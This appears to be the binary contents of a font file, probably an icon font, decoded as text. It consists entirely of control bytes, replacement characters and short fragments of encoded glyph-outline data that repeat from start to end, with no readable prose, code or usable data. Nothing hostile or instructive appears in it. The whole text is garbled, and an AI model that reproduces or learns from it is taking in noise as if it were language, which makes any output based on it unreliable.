
`
 �%`& �
`
 %%


&%%


%����!.7CL{!2#!"&=463"3!26=4&#!532+#5732654&#532+#732654&#%";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��`%&@  @

��`%&@  @

`&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%�@%%`� @

 @%%`�@

 %%


&%%


%����&2;j!2#!"&=4633532654&+732654&#3532654&+32654&#%";2+"&51#1;2654&+"&546;234&+ (88(��(88(� @&%` @

�� @&%` @

`&% 

 
 % &% 

 
 % �8(�(88(�(8��`%%@ @

 �`%% @

 %%


&%%


%����!,6GX`!2#!"&=463"3!26=4&#!32+5326=4&#732+"&=463";26=4&+33535# (88(��(88(%& %&��`%&` @

� %& %&

 

 � @��8(�(88(�(8 &�%&�%@&`%� �
`
 &`%&`% 
`

`
��  ����%6GO!2#!"&=463326=4&+326=4&#7";26=4&+";26=4&+33535# (88(��(88(`&%` @

�&% &% 

 

 � @��8(�(88(�(8`�%`& �
`
 %`&%`& 
`

`
��  ����!)5=!2#!"&=463"3!26=4&#!3535#'373#'#%3535# (88(��(88(%& %&��@ @�@ 00 @@ 00  @��8(�(88(�(8 &�%&�%`��  PpTTppTT���  ����$,!2#!"&=4633535#373'7#'#3535# (88(��(88(@ @�@ 00 @@ 00  @��8(�(88(�(8���  PpTTppTT ��  ����!/8@J!2#!"&=463"3!26=4&#!##532##'32654&#33535#535#3535 (88(��(88(%& %&��: `%%@&Z@

� @�� `�8(�(88(�(8 &�%&�%�`�%%`�@

��  @@ �` ����'/9!2#!"&=4633'2654&+35532654&#33535#535#3535 (88(��(88(:@&@%%` @

� @�� `�8(�(88(�(8�``%%�``@

��  @@ �` ����!.1<C!2#!"&=463"3!26=4&#!'#353735##73535#5#73#'3 (88(��(88(%& %&��P0       �::    `0 @ @ �8(�(88(�(8 &�%&�%�`�@@��Pp@@ �� ������� +2!2#!"&=463'#353735#53535#5#'#37# (88(��(88(P0       �::    `0 @ @ �8(�(88(�(8�`�@@��PP @@ �� �������!+18!2#!"&=463"3!26=4&#!535#3535#53?3#'3 (88(��(88(%& %&�� �� `� �0 @ @ �8(�(88(�(8 &�%&�%�@ �` ` �������� '"3!26=4&#!3##53##53?3#'3(88( (88(�� `` ��@� �0 @ @ �8(�(88(�(8� `� � ��������!.;D]!2#!"&=463"3!26=4&#!'#353735#532+#5732654&##"&=46;5#";5#3 (88(��(88(%& %&��P0       @`%&@  @

�@

``&%``@�8(�(88(�(8 &�%&�%�`�@@��@@%%`� @

`@
`
 %`&� ����*3L!2#!"&=463'#353735#3532654&+732654&##"&=46;5#";5#3 (88(��(88(P0       @ @&%` @

�@

``&%``@�8(�(88(�(8�`�@@��@�`%%@ @

`@
`
 %`&� ����*;LT7'>=4&+";267'#"&=46;2'!2#!"&=463"3!26=4&#!3535#�% &% 

 
,"� (88(��(88(%& %&��` @�D	`&%`&
`

`
," 8(�(88(�(8 &�%&�%`��  ����*;C+"&=46;2''#"&=46;2'"3!26=4&#!#53##� %& %

 
,"�(88( (88(��`@�@ D&`%&`	
`

`
," 8(�(88(�(8�  �����!.:EO!2#!"&=463"3!26=4&#!'#353735##35#535#732+5326=4&# (88(��(88(%& %&��p0       ` `  `�`%&` @

�8(�(88(�(8 &�%&�%�`�@@�� �  �   &`%� �
`
����)4>!2#!"&=463'#353735##35#535#7326=4&+326=4&# (88(��(88(p0       ` `  `�`&%` @

�8(�(88(�(8�`�@@�� �  �   �%`& �
`
����!Ngs|!2#!"&=463"3!26=4&#!46;2+"&53;2654&+532654&+"#"&=46;5#";5#37532+#732654&# (88(��(88(%& %&��& %

& % 
 

  

 
 @

``&%``@@`%&@  @

�8(�(88(�(8 &�%&�%�%%		%%


 


@@
`
 %`&� @@%%`�@

����>Wcl!2#!"&=463346;2+32+"&5#;2654&'>54&+"#"&=46;5#";5#373532654&+32654&# (88(��(88( 
 

  

 
 % &

% &@@

``&%``@@ @&%` @

�8(�(88(�(8�


 


%%		%%@@
`
 %`&� @�`%% @

`���-8DNX!2#!"&=46"3!26=4&###546;2#'"354&+3#35#535#535#35353535#3535��(88(�`(88(&%�&%��` & % @
`
 � `  `��� ``�� `�8(�(88(�(8 &�%&�%�`�%%��
  
�  �  @@ �` @ �` `���(4>H!2#!"&=46354&+"357"354&+3#35#535#535#35353535#3535��(88(�`(88� % &  
`
 � `  `��� ``�� `�8(�(88(�(8�`�%%�``
  
�  �  @@ �` @ �` ����!/:HSt!2#!"&=463"3!26=4&#!##546;2#'"354&+##546;2#'"354&++"&=46;2#4&+";2653 (88(��(88(%& %&��` & % @
`
 ` & % @
`
  & %& & 
 

 
 �8(�(88(�(8 &�%&�%�`�%%��
  
``�%%��
  
�%&`%%

`

����)7Bc"3!26=4&#!##546;2#'"354&+##546;2#'"354&++"&=46;2#4&+";2653(88( (88(��` & % @
`
 ` & % @
`
  & %& & 
 

 
 �8(�(88(�(8�`�%%��
  
``�%%��
  
�%&`%%

`

����!/=HO!2#!"&=463"3!26=4&#!#'#5373537##546;2#'"354&+73#'3 (88(��(88(%& %&��00      �` & % @
`
 �0 @ @ �8(�(88(�(8 &�%&�%��``�@@��``�%%��
  
��������,7>"3!26=4&#!#'#5373537##546;2#'"354&+73#'3(88( (88(��00      �` & % @
`
 �0 @ @ �8(�(88(�(8��``�@@��``�%%��
  
��������!+7CL!2#!"&=463"3!26=4&#!75#3357#35#535#532+#732654&# (88(��(88(%& %&��@�����@ `  `�`%&@  @

�8(�(88(�(8 &�%&�%��  �  ��  �   @%%`�@

����&2;!2#!"&=46375#3357#35#535#3532654&+32654&# (88(��(88(@�����@ `  `� @&%` @

�8(�(88(�(8��  �  ��  �   �`%% @

����!1BJR!2#!"&=463"3!26=4&#!32+"&=46";26=4&+33535#!3535# (88(��(88(%& %&��@ %& %&

 

 � @� @��8(�(88(�(8 &�%&�%@&`%&`% 
`

`
��  ��  ���� 19A!2#!"&=463";26=4&#";26=4&+33535#!3535# (88(��(88(@&% &% 

 

 � @� @��8(�(88(�(8`%`&%`& 
`

`
��  ��  ����!)BL!2#!"&=463"3!26=4&#!3535##"&=46;5#";5#375#335 (88(��(88(%& %&��@ @�@@

``&%``@`������8(�(88(�(8 &�%&�%`��  `@
`
 %`&� @�  �  ����1;!2#!"&=4633535##"&=46;5#";5#375#335 (88(��(88(@ @�@@

``&%``@`������8(�(88(�(8���  `@
`
 %`&� @�  �  ����!,6C\!2#!"&=463"3!26=4&#!32+5326=4&#'#353735##"&=46;5#";5#3 (88(��(88(%& %&��`%&` @

�0       �@

``&%``@�8(�(88(�(8 &�%&�%@&`%� �
`
@`�@@��@
`
 %`&� ����%2K!2#!"&=463326=4&+326=4&#'#353735##"&=46;5#";5#3 (88(��(88(`&%` @

�0       �@

``&%``@�8(�(88(�(8`�%`& �
`
@`�@@��@
`
 %`&� ����!-[k|!2#!"&=463"3!26=4&#!#35#535#7";2+"&51#1;2654&+"&546;234&#;2+"&=46";26=4&+ (88(��(88(%& %&��@ `  `�&% 

 
 % &% 

 
 %� %& %&

 

 �8(�(88(�(8 &�%&�%`�  �   %%


&%%


%&`%&`% 
`

`
����J[l!2#!"&=463#35#535#7";2+"&51#1;2654&+"&546;234&#3";26=4&+";26=4&+ (88(��(88(@ `  `�&% 

 
 % &% 

 
 %�&% &% 

 

 �8(�(88(�(8��  �   %%


&%%


%%`&%`& 
`

`
����!/8FQ_h!2#!"&=463"3!26=4&#!##532##'32654&###546;2#'"354&+##532##'32654&# (88(��(88(%& %&��: `%%@&Z@

�` & % @
`
 � `%%@&Z@

�8(�(88(�(8 &�%&�%�`�%%`�@

``�%%��
  
``�%%`�@

����'5@NW"3!26=4&#!##532##'32654&###546;2#'"354&+##532##'32654&#(88( (88(��: `%%@&Z@

�` & % @
`
 � `%%@&Z@

�8(�(88(�(8�`�%%`�@

``�%%��
  
``�%%`�@

����!:FP!2#!"&=463"3!26=4&#!#"&=46;5#";5#37#35#535#535#3535 (88(��(88(%& %&��@

``&%``@` `  `��� `�8(�(88(�(8 &�%&�%�@
`
 %`&� `�  �  @@ �` ����)5?!2#!"&=463#"&=46;5#";5#37#35#535#535#3535 (88(��(88(�@

``&%``@` `  `��� `�8(�(88(�(8�@
`
 %`&� `�  �  @@ �` @`	+Dahx#5353#73+"&=3;26='#353735#'5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46�  `  � & % 
 
�0       ��&%�%(88(� 
� 

@%��(88(��v
` &%��&%��ࠠ��%&��

�``�@@��``�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@�`"2<Q^%#!"&5463!;!"3!;"3!26=4&##5353#73+"&=3;26=73#5#'#53�%� %&@&���(88( �
���%& %&�  `  � & % 
 
�0       �@%&�&�%@8(�(8�
�&�%&�%��ࠠ��%&��

�``�@@��@`$AHXa��3532654&+%5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=463!2#!"&5732+%";2+"&51#1;2654&+"&546;234&+#"&=46;5#";5#3� @&%` ���&%�%(88(� 
� 

@%��(88(��v
�% &%��&`@

@�&% 

 
 % &% 

 
 % �@

``&%``@��`%%``�&� &%@8(�(8�`@

�
�%@8(�(8��
���&%�&%�

`%%


&%%


%�@
`
 %`&� @�`"2KW`�%#!"&5463!;!"3!;!2#!"&=46#"&=46;5#";5#3%3532654&+32654&#%";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%[@

``&%``@�� @&%` @

`&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&�@
`
 %`&� @�`%% @

 %%


&%%


%
@`5<LZeqz��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+532+#732654&#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�` & % @
`
 �`%&@  @

``%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
 @%%`�@

 @%%`�@

	@�`"2@KW`lu%#!"&5463!;!"3!;!2#!"&=46354&+"357"354&+3532654&+32654&#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%� % &  
`
 � @&%` @

` @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�`�%%�``
  
 �`%% @

 �`%% @

@`5<LXak�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&##5353#7#"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&@  @

�  `  �@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

 �ࠠ�`@
`
 %`&� @�`"2>GQj%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#35#'#3%#"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&% @&%` @

�`  `   @

``&%``@�@%&�&�%@8(�(8�
�%�&%�&��`%% @

 �ࠠ�`@
`
 %`&� 	@`5<LVbkv�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46535#3535%532+#732654&#732+5326=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%��� `�`%&@  @

``%&` @

@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ �`  @%%`�@

 &`%� �
`
@�`"2<HQ\g%#!"&5463!;!"3!;!2#!"&=46535#3535%3532654&+32654&#7326=4&+326=4&+�%� %&@&���(88( �
��� &%��&%��� `� @&%` @

``&%` @

@�@%&�&�%@8(�(8�
�%�&%�&�@ �`  �`%% @

 �%`& �
`
@`5<LY���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'#353735#46;2+"&53;2654&+532654&+"#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%k0       & %

& % 
 

  

 
�`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�@@��@%%		%%


 


@%%`�@

@�`"2?lx�%#!"&5463!;!"3!;!2#!"&=46'#353735#346;2+32+"&5#;2654&'>54&+"3532654&+32654&#�%� %&@&���(88( �
��� &%��&%k0        
 

  

 
 % &

% &� @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�`�@@��@


 


%%		%%�`%% @

	@`5<LOZgs|5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#73535#5#%'#353735#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�::    `��0       @`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�Pp@@ �� @`�@@��@@%%`�@

@�`"25@MYb%#!"&5463!;!"3!;!2#!"&=4653535#5#%'#353735#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%�::    `��0       @ @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�PP @@ �� @`�@@��@�`%% @

@`5<L\mz�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+'#353735#73#'3����&%�%(88(� 
� 

@%��(88(��v
` &%��&% %& %&

 

 �0       P0 @ @  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
@`�@@�ਨ��@�`"2CTah%#!"&5463!;!"3!;!2#!"&=46";26=4&+";26=4&+'#353735#'#37#�%� %&@&���(88( �
��� &%��&%&% &% 

 

 �0       P0 @ @ �@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
@`�@@�ਨ��@`5<Lamv�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46;26=#+"&=#7532+#732654&##"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%% & 
 
 �`%&@  @

�@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&� &%��

 @@%%`�@

`@
`
 %`&� @�`"2GS\u%#!"&5463!;!"3!;!2#!"&=46;26=#+"&=#73532654&+32654&##"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&%% & 
 
 � @&%` @

�@

``&%``@�@%&�&�%@8(�(8�
�%�&%�&� &%��

 @�`%% @

`@
`
 %`&� @`5<LXcp5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463#53#3#5373#%#5'53753����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�����`��  V*pp*j @ 00  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ � @ 
V�VVpp````  HH  @�`"2>IV%#!"&5463!;!"3!;"3!26=4&#3#53#3#5373#%#5'53753�%� %&@&���(88( �
���%& %&������`��  V*pp*j @ 00 �@%&�&�%@8(�(8�
�&�%&�%�@ � @ 
V�VVpp````  HH  `5<LRZfs!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&##53%3535#53#5##53!'#353735#`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&� �� @�@  `  �0        8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%� ���  @`�``�``�@@���`"28@LY%#!"&5463!;!"3!;!2#!"&=46#5#3%3535##5#35335#'#353735#`%� %&@&��`(88(��
��`�&&� &&�� ��  @�@`  `  P0       �@%&�&�%@8(�(8�
�%�&%�&����  @`�``�``�@@��@`5<Lm��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46+"&=46;2#4&+";26537";2+"&51#1;2654&+"&546;234&+3";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�& %& & 
 

 
 `&% 

 
 % &% 

 
 % �&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�%&`%%

`

�%%


&%%


%%%


&%%


%@�`"2S��%#!"&5463!;!"3!;!2#!"&=46#+"&=46;234&+";2657";2+"&51#1;2654&+"&546;234&+3";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%� 
 

 
 & &% &`&% 

 
 % &% 

 
 % �&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&�

`

%%`&%�%%


&%%


%%%


&%%


%
`5<LShv���!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#73#'3;26=#+"&=#!##546;2#'"354&+##546;2#'"354&+`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&��0 @ @ �`% & 
 
 @` & % @
`
 �` & % @
`
  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%��� &%��

 `�%%��
  
``�%%��
  
	�`"29N\gu�%#!"&5463!;!"3!;"3!26=4&#73#'33;26=3+"&=!##546;2#'"354&+##546;2#'"354&+`%� %&@&��`(88(��
��`&&�&&��0 @ @ �` 
 
 & %@` & % @
`
 �` & % @
`
 �@%&�&�%@8(�(8�
�&�%&�%��� 

��%& `�%%��
  
``�%%��
  
	@`5<LXa���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&#7";2+"&51#1;2654&+"&546;234&+;2+5326=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&@  @

�&% 

 
 % &% 

 
 % �`%&` @

@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

 %%


&%%


%&`%� �
`
@�`"2>Gv��%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#7";2+"&51#1;2654&+"&546;234&+3326=4&+326=4&+�%� %&@&���(88( �
��� &%��&% @&%` @

�&% 

 
 % &% 

 
 % �`&%` @

@�@%&�&�%@8(�(8�
�%�&%�&��`%% @

 %%


&%%


%�%`& �
`
@`5<LXfq5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#35#535###546;2#'"354&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%{ `  ``` & % @
`
  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`�  �  ``�%%��
  
@�`"2>LW%#!"&5463!;!"3!;"3!26=4&##53#3#53'##546;2#'"354&+�%� %&@&���(88( �
���%& %&� `  ` �` & % @
`
 �@%&�&�%@8(�(8�
�&�%&�%`  �  @`�%%��
  

@`5<L\en{��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+732654&#32654&#7'#353735#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%

&` @

@@

�0       @`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�x%		%�@

`@

 `�@@��@@%%`�@

	@�`"2BKTamv%#!"&5463!;!"3!;!2#!"&=4632654&'>54&+32654&#32654&#7'#353735#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%`&

%` @

@@

�0       @ @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�h%		% @

`@

 `�@@��@�`%% @

@`5<LZep�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#'#537353%32+5326=4&+#"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%k00      ��`%&` @

@�@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&��``�@@���&`%� �
`
`@
`
 %`&� @�`"2@KVo%#!"&5463!;!"3!;!2#!"&=4635#'#5#37%326=4&+326=4&+#"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&%k      00��`&%` @

@�@

``&%``@�@%&�&�%@8(�(8�
�%�&%�&���@@��``��%`& �
`
`@
`
 %`&� @`5<LXdm�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463#53#37532+#732654&#7";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%;����`@`%&@  @

�&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ � @ @@%%`�@

 %%


&%%


%@�`"2>JS�%#!"&5463!;!"3!;!2#!"&=4635#535#35#73532654&+32654&#7";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%;``����� @&%` @

�&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&� @ � ��`%% @

 %%


&%%


%`5<LT`jt!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#3535#3#35#535#535#35353535#3535`@(88(��%� %&`� ��(88(@�%��

�
�
v��&%�&%�� @�� `  `��� ``�� ` 8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%`��  �  �  @@ �` @ �` �`"2:FPZ%#!"&5463!;!"3!;!2#!"&=463535#3#35#535#535#35353535#3535`%� %&@&���(88(`�
����%&�`%&Z @�� `  `��� ``�� `�@%&�&�%@8(�(8�
�%�&%�&`��  �  �  @@ �` @ �` @`5<L\mu�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+33535#%";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ %& %&

 

 � @�&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
��   %%


&%%


%@�`"2BS[�%#!"&5463!;!"3!;!2#!"&=46";26=4&#";26=4&+33535#%";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%[&% &% 

 

 � @�&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
��   %%


&%%


%	@`5<LXamy�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&#53#5##537532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&@  @

�  `  �`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

@`�``�` @%%`�@

@�`"2>GS_h%#!"&5463!;!"3!;!2#!"&=463532654&+32654&##5#35335#3532654&+32654&#�%� %&@&���(88( �
��� &%��&% @&%` @

�`  `  @ @&%` @

�@%&�&�%@8(�(8�
�%�&%�&��`%% @

@`�``�@�`%% @

@�`5<LXan5'!"3!26=326=4&+#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&##5'53753����&%�%�(88(� 
� 

@%���(88(`��v
� &%��&%{`%&@  @

� @ 00  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

````  HH  @�`"2>GT%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#75#'5#3�%� %&@&���(88(��
��� &%��&%{ @&%` @

�@ 00 @ �@%&�&�%@8(�(8�
�%�&%�&��`%% @

``  HH  ``@�`5<Lm32+#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#+"&=46;2#4&+";2653��(88(�%� %&`� ��(88( �%��

�
�
v��%& %&�& %& & 
 

 
  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%�%&`%%

`

@�`"2S%#!"&5463!;!"3!;"3!26=4&#+"&=46;2#4&+";2653�%� %&@&���(88(@�
���%& %&�& %& & 
 

 
 �@%&�&�%@8(�(8�
�&�%&�%�%&`%%

`

@�`*C`gw��%7'>=4&+";267'#"&=46;2'5'!"3!26=326=4&+#!"&5463!;!"3!#"&=!2#!"&=46";2+"&51#1;2654&+"&546;234&##53�% &% 

 
,"'���&%�%�(88(� 
� 

@%���(88( ��v
� &%��&%[&% 

 
 % &% 

 
 %�� �	`&%`&
`

`
," `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@%%


&%%


%� �@�`"2I]��%#!"&5463!;!"3!;"3!26=4&#+"&=46;2''#"&=46;2''32#4&+";2+"&5131;2654&+"&546#53�%� %&@&���(88(@�
���%& %&� %& %

 
,"� % 
 

 %& % 
 

 %&�� �@%&�&�%@8(�(8�
�&�%&�%��&`%&`	
`

`
,"�%


%%&


%%� �	@�`5<LZcs|�5'!"3!26=326=4&+#!"&5463!;!"3!#"&=!2#!"&=46##532##'32654&#532+732654&#32654&#����&%�%�(88(� 
� 

@%���(88( ��v
� &%��&%� `%%@&Z@

``%

&` @

@@

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%`�@

Xx%		%�@

`@

@�`"2@IYbk%#!"&5463!;!"3!;"3!26=4&###532##'32654&#532+732654&#32654&#�%� %&@&���(88(@�
���%& %&�z `%%@&Z@

``%

&` @

@@

�@%&�&�%@8(�(8�
�&�%&�%�`�%%`�@

Xx%		%�@

`@

	@`5<Lmy���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46+"&=46;2#4&+";26537532+#732654&#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�& %& & 
 

 
  `%&@  @

``%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�%&`%%

`

`@%%`�@

 @%%`�@

@�`"2S_ht}%#!"&5463!;!"3!;!2#!"&=46#+"&=46;234&+";26573532654&+32654&#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%� 
 

 
 & &% &  @&%` @

` @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�

`

%%`&%`�`%% @

 �`%% @

@`5<LTm{�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463535##"&=46;5#";5#33##546;2#'"354&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ @�@@

``&%``@�` & % @
`
  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`��  `@
`
 %`&� `�%%��
  
@�`"2:Sal%#!"&5463!;!"3!;!2#!"&=463535##"&=46;5#";5#33354&+"357"354&+�%� %&@&���(88( �
��� &%��&%[ @�@@

``&%``@� % &  
`
 �@%&�&�%@8(�(8�
�%�&%�&`��  `@
`
 %`&� `�%%�``
  
@`5<LXcnx5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'373#'#'32+5326=4&+535#3535����&%�%(88(� 
� 

@%��(88(��v
` &%��&%@ 00 @@ 00 �`%&` @

@��� ` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�pTTppTT�&`%� �
`
@@ �` @�`"2>IT^%#!"&5463!;!"3!;!2#!"&=46373'7#'##326=4&+326=4&+535#3535�%� %&@&���(88( �
��� &%��&%@ 00 @@ 00 �`&%` @

@��� `�@%&�&�%@8(�(8�
�%�&%�&�pTTppTT�%`& �
`
@@ �` 	@`5<LWbr��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+5326=4&+732+"&=46";26=4&++"&=46;2#4&+";2653����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&` @

@� %& %&

 

  & %& & 
 

 
  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%� �
`
 &`%&`% 
`

`
�%&`%%

`

@�`"2=HYj�%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+7";26=4&+";26=4&+#+"&=46;234&+";265�%� %&@&���(88( �
��� &%��&%`&%` @

@�&% &% 

 

   
 

 
 & &% &�@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 %`&%`& 
`

`
�

`

%%`&%	@`5<L\mx��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+732+5326=4&+33535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ %& %&

 

 �`%&` @

@� @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
 &`%� �
`
��  @�`"2BS^iq%#!"&5463!;!"3!;!2#!"&=46";26=4&#";26=4&+7326=4&+326=4&+33535#�%� %&@&���(88( �
��� &%��&%[&% &% 

 

 �`&%` @

@� @��@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
 �%`& �
`
��  @`5<LX^�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'373#'#%#537";2+"&51#1;2654&+"&546;234&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[@ 00 @@ 00 `� �&% 

 
 % &% 

 
 %  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�pTTppTT  �%%


&%%


%@�`"2>Dr%#!"&5463!;!"3!;"3!26=4&#'373#'#%#53732#4&+";2+"&5131;2654&+"&546�%� %&@&���(88( �
���%& %&� @ 00 @@ 00 `� � % 
 

 %& % 
 

 %&�@%&�&�%@8(�(8�
�&�%&�%�pTTppTT  �%


%%&


%%
`5<LWbr���!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&#32+5326=4&+732+"&=46";26=4&++"&=46;2#4&+";26537'373#'#`@(88(��%� %&`� ��(88(��%��

�
�
v��&&�&&� `%&` @

@� %& %&

 

  & %& & 
 

 
 `@ 00 @@ 00  8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%@&`%� �
`
 &`%&`% 
`

`
�%&`%%

`

0pTTppTT	�`"2=HXi��%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+7";26=4&#";26=4&+#+"&=46;234&+";2657373'7#'#`%� %&@&��`(88(��
��`�&&� &&`&%` @

@�&% &% 

 

   
 

 
 & &% &`@ 00 @@ 00 �@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
 %`&%`& 
`

`
�

`

%%`&%0pTTppTT	@`5<LXamv~5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&#532+#732654&#!3535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�`%&@  @

��`%&@  @

` @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

 @%%`�@

��  @�`"2>GS\d%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#3532654&+32654&#!3535#�%� %&@&���(88( �
��� &%��&%� @&%` @

�� @&%` @

` @��@%&�&�%@8(�(8�
�%�&%�&��`%% @

 �`%% @

